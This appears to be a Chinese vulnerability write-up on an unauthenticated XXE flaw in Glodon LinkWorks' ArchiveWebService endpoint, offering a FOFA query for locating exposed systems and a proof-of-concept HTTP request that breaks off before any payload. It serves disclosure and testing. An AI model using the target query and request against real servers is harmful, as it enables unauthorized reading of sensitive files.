广联达Linkworks ArchiveWebService XML实体注入漏洞复现

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现 

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-07-18 07:32:04       43 阅读
  2. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-07-18 07:32:04       35 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-18 07:32:04       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-18 07:32:04       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-18 07:32:04       57 阅读
  4. Python语言-面向对象

    2024-07-18 07:32:04       68 阅读

热门阅读

  1. 构建之源:深入解析Gradle的settings.gradle文件

    2024-07-18 07:32:04       22 阅读
  2. 构建Scala项目的魔法:Gradle中配置Scala插件

    2024-07-18 07:32:04       22 阅读
  3. Starrocks创建物化视图时不能写select *

    2024-07-18 07:32:04       20 阅读
  4. C语言——指针简介及基本要点

    2024-07-18 07:32:04       20 阅读
  5. uniapp小程序项目解决键盘问题

    2024-07-18 07:32:04       21 阅读
  6. C# 类型的默认值

    2024-07-18 07:32:04       20 阅读
  7. [PostgreSql]获取表结构数据

    2024-07-18 07:32:04       19 阅读